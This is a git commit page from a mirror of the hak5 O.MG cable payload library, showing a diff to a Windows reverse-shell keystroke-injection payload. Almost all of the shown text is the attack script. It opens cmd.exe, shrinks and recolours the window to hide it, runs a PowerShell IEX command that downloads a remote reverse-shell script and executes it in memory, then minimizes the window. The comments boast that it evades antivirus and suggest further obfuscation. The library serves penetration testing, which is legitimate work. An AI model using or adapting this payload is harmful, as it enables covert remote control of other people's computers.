hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated the payload 

Hey! I updated the payload with the suggestions, optimized the code and used the ALT SPACE DOWN to minimize  (The ALT SPACE M didnt work here in my Windows 10 machine, but this way works very well).
pull/3/head
Hug1nN_ 2021-10-14 13:59:23 -03:00 committed by GitHub
parent 9120061d11
commit 0d4852700b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
payloads/library/remote_access/revshell_windows/payload.txt
View File

@ -1,36 +1,26 @@
REM ############################################################################################################# REM #############################################################################################################
REM # This script is designed to get a reverse shell in Windows enviroments # REM # Title: Windows Reverse Shell #
REM # Description: This script is designed to get a reverse shell in Windows enviroments #
REM # with a one liner powershell command, this bypasses almost all antivirus out there and executes in memory. # REM # with a one liner powershell command, this bypasses almost all antivirus out there and executes in memory. #
REM # To use it, just clone the reverse shell, change the IP, load it into the OMG cable and wait for nc. # REM # To use it, just clone the reverse shell, change the IP, load it into the OMG cable and wait for nc. #
REM # You can even ofuscate the powershell with Invoke-Obfuscation and pyfuscation to make it even more # REM # You can even ofuscate the powershell with Invoke-Obfuscation and pyfuscation to make it even more #
REM # undetectable. # REM # undetectable. #
REM # Script made by Hug1nn_ # REM # Author: Hug1n #
REM ############################################################################################################# REM #############################################################################################################
REM @@ Opening the CMD
GUI r GUI r
DELAY 500 DELAY 500
REM @@ Opening CMD
STRING cmd.exe STRING cmd.exe
ENTER ENTER
DELAY 200 DELAY 200
REM @@ Minimizing the CMD to ofuscate it REM @@ Changing the color, risizing the CMD and executing the reverse shell in memory
STRING mode con:cols=18 lines=1 STRING cmd /C color FE&mode con:cols=18 lines=1&powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/Hug1n/reverse_shells/main/minrev.ps1')"
ENTER
DELAY 200 DELAY 200
REM @@ Chaging the color
STRING color FE
ENTER ENTER
DELAY 200 REM @@ Minimizing the CMD
REM @@ Executing the shell in memory
STRING powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/Hug1n/reverse_shells/main/minrev.ps1')"
ENTER
DELAY 200
REM @@ Minimizing
ALT SPACE ALT SPACE
DOWNARROW DOWN
DELAY 200 DOWN
DOWNARROW DOWN
DELAY 200
DOWNARROW
DELAY 200
ENTER ENTER